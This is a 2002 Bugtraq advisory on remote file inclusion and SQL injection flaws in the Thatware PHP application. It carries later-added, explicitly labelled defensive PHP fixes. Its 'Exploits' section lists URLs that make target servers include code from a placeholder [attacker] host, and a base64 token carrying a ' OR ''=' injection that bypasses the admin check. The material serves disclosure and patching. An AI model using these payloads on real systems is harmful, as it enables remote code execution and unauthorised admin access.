Bugtraq mailing list archives

Thatware (PHP)


From: "Frog Man" <leseulfrog () hotmail com>
Date: Sun, 01 Dec 2002 19:35:11 +0100


Information :
°°°°°°°°°°°°°°
Versions : ? -> 0.3 -> 0.5.3
Website : http://www.thatware.org
Problems :
- File inclusion (remote include through the $root_path variable)
- SQL Injection (in the auth.inc.php admin check)

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
artlist.php (v0.5.2, 0.5.3) :
-------------------------------------
include $root_path.'thatfile.php';
-------------------------------------


config.php (v? -> 0.3 -> 0.5.3)  :
-------------------------------------
include $root_path."db_settings.php";
-------------------------------------

thatfile.php (v? -> 0.3 -> 0.5.2) :
------------------------------------------------------------------------
if (!IsSet($thatfile)) {
  include($root_path."config.php");
  if (!IsSet($translation_set)) {
    include $root_path."messages.$language.php"; } #Translation module, even for english needed!
------------------------------------------------------------------------

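The three include problems above have the same root cause: $root_path (and, in thatfile.php, $language) is used to build an include path without ever being assigned in the script, so with register_globals enabled the value can come from the query string, and with allow_url_fopen enabled a remote URL is fetched and executed. The following snippet is an added example of the defensive pattern, not code from the advisory or from Thatware: the base path is derived from the script's own location, and every include built from a variable is checked to resolve inside that base. The helper name safe_include_path and the language allow-list are assumptions made for the example.

```php
<?php
// Added example (not Thatware's code): derive the include base from the
// script's own location instead of trusting a variable that, with
// register_globals on, can be set from the query string (?root_path=...).
// Assumed layout: this file sits in the application root next to
// config.php and the messages.<lang>.php files.

// Always assign $root_path here; never rely on it being "already set".
$root_path = dirname(__FILE__) . '/';

// Resolve $root . $file and accept it only if it is an existing file
// inside $root. realpath() returns false for URLs ("http://...") and for
// missing files, and the prefix test rejects "../" escapes.
function safe_include_path($root, $file)
{
    $base      = realpath($root);
    $candidate = realpath($root . $file);
    if ($base === false || $candidate === false) {
        return false;
    }
    if (strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $candidate;
}

// $language is interpolated into a file name, so it must come from a fixed
// allow-list rather than straight from a request variable.
$allowed_languages = array('en', 'fr', 'de');   // constructed list (assumption)
if (!isset($language) || !in_array($language, $allowed_languages, true)) {
    $language = 'en';
}

$cfg = safe_include_path($root_path, 'config.php');
$msg = safe_include_path($root_path, "messages.$language.php");
if ($cfg === false || $msg === false) {
    die('Required application file not found');
}
include $cfg;
include $msg;
```

On the server side the same class of bug is contained by running with register_globals = Off and allow_url_fopen = Off (on current PHP releases, allow_url_include = Off) in php.ini, so that an include path can neither be injected from the request nor point at a remote host; the code-level check above stays useful because it does not depend on the php.ini of whichever host the application is deployed on.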
auth.inc.php (v? -> 0.3 -> 0.5.0) :
------------------------------------------------------------------------
$admintest = 0;
$mod_ok = 0;
$moderator = 0;

if(isset($user)) {
  if (!$thatfile) include("thatfile.php");
  $admin = base64_decode($user);
  $admin = explode(":", $admin);
  if (empty($admin[0]) || empty($admin[2])) exit;
  $aid = $admin[1];
  dbconnect();
  $result=mysql_query("select rights from users where uid='$admin[0]' and pass='$admin[2]'");
  if(!$result) {
    echo "Oh oh... select from database failed for admin check";
    exit;
  } else {
    list($auth_rights)=mysql_fetch_row($result);
    $auth_rights=explode(",",$auth_rights);
    if (!empty($auth_rights)) {
      $admintest=1;
      if (inarray($auth_rights, "4")||inarray($auth_rights, "1")) {
        $moderator=1;
        $mod_ok=1;
      }
    }
  }
}
------------------------------------------------------------------------
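In auth.inc.php the uid and password taken from the base64 $user token are pasted straight into the SELECT, so a token whose fields contain quotes rewrites the WHERE clause. The snippet below is an added example of the same check written so that the token fields are only ever sent as bound data; it is not the advisory's or Thatware's code. It assumes a mysqli connection in $db, a users table with columns uid, pass (holding a password_hash() digest rather than plaintext) and rights, and the function name check_admin is made up for the example.

```php
<?php
// Added example (not Thatware's code): the auth.inc.php admin check with
// the values from the $user token bound as parameters instead of being
// interpolated into the query string.
// Assumptions: $db is a connected mysqli object; table users(uid, pass, rights)
// where pass is a password_hash() digest and rights is a comma-separated list.

function check_admin(mysqli $db, $user_token)
{
    $admintest = 0;
    $moderator = 0;
    $mod_ok    = 0;
    $denied    = array($admintest, $moderator, $mod_ok);

    // Strict decoding rejects tokens that are not valid base64 at all.
    $decoded = base64_decode($user_token, true);
    if ($decoded === false) {
        return $denied;
    }
    // Same uid:aid:pass layout as the original token.
    $parts = explode(':', $decoded, 3);
    if (count($parts) !== 3 || $parts[0] === '' || $parts[2] === '') {
        return $denied;
    }
    list($uid, $aid, $pass) = $parts;

    // The placeholder is sent as data: a uid of "' OR ''='" is compared
    // literally against the column and matches no row.
    $stmt = $db->prepare('SELECT pass, rights FROM users WHERE uid = ?');
    if ($stmt === false) {
        return $denied;
    }
    $stmt->bind_param('s', $uid);
    $stmt->execute();
    $stmt->bind_result($stored_hash, $rights);
    $found = $stmt->fetch();
    $stmt->close();

    // Password verification happens in PHP against the stored hash, so the
    // password never appears in SQL and is never stored in clear.
    if (!$found || !password_verify($pass, $stored_hash)) {
        return $denied;
    }

    // Rights handling as in the original: any authenticated user passes the
    // admin test, and rights 4 or 1 grant moderator status.
    $auth_rights = array_map('trim', explode(',', $rights));
    $admintest = 1;
    if (in_array('4', $auth_rights, true) || in_array('1', $auth_rights, true)) {
        $moderator = 1;
        $mod_ok    = 1;
    }
    return array($admintest, $moderator, $mod_ok);
}

// Usage at the point where auth.inc.php consumed $user (e.g. from a cookie):
// list($admintest, $moderator, $mod_ok) = check_admin($db, $_COOKIE['user']);
```

Two details are worth keeping in mind when porting such a fix: the original code also relied on $user arriving through register_globals, so the hardened version should read it explicitly from $_COOKIE or $_GET, and the lookup should be by uid alone with the password checked afterwards, because a query of the form "uid = ? AND pass = ?" still works but forces plaintext password storage.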



Exploits :
°°°°°°°°°°
v0.5.2, 0.5.3 :
http://[target]/artlist.php?root_path=http://[attacker]/
with
http://[attacker]/thatfile.php


v? -> 0.3 -> 0.5.3 :
http://[target]/config.php?root_path=http://[attacker]/
with
http://[attacker]/db_settings.php


v? -> 0.3 -> 0.5.2 :
http://[target]/thatfile.php?root_path=http://[attacker]/&language=1
with
http://[attacker]/config.php
and
http://[attacker]/messages.1.php


v? -> 0.3 -> 0.5.0 :
http://[target]/[NeedToBeAuth].php?user=JyBPUiAnJz0nOjE6JyBPUiAnJz0n
( base64_decode(JyBPUiAnJz0nOjE6JyBPUiAnJz0n) == ' OR ''=':1:' OR ''=')



Patches :
°°°°°°°°
0.5.3:
http://www.phpsecure.org/patch/dl.php?id=47
0.5.2:
http://www.phpsecure.org/patch/dl.php?id=51
0.5.0:
http://www.phpsecure.org/patch/dl.php?id=50
0.4.5:
http://www.phpsecure.org/patch/dl.php?id=52
0.4.4:
http://www.phpsecure.org/patch/dl.php?id=49
0.4.3:
http://www.phpsecure.org/patch/dl.php?id=48
0.4.2:
http://www.phpsecure.org/patch/dl.php?id=53
0.4.1:
http://www.phpsecure.org/patch/dl.php?id=54
0.4:
http://www.phpsecure.org/patch/dl.php?id=55
0.3:
http://www.phpsecure.org/patch/dl.php?id=56

More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/Thatware.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FThatware.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n



